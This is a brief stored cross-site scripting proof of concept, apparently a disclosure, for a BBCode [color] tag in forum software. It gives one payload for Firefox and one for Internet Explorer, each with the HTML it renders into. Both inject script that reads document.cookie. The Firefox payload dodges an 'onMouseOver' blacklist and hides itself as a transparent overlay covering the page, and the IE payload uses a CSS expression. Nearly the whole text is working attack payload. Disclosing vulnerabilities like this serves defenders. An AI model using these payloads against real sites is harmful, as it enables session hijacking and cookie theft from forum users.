Stored XSS - proof of concept for Firefox ("onMouseOver" is blacklisted):

    [color=red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)']XSS4FF[/color] 


Renders into the following HTML code:

    &lt;font color='red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)'&gt;XSS4FF&lt;/font&gt; 



Stored XSS - proof of concept for Internet Explorer ("style" cannot contain parenthesis "(" ):

    [color=red' /style='color:expression(alert(document.cookie))']XSS4IE[/color] 



Renders into the following HTML code:

    &lt;font color='red' /style='color:expression(alert(document.cookie))'&gt;XSS4IE&lt;/font&gt;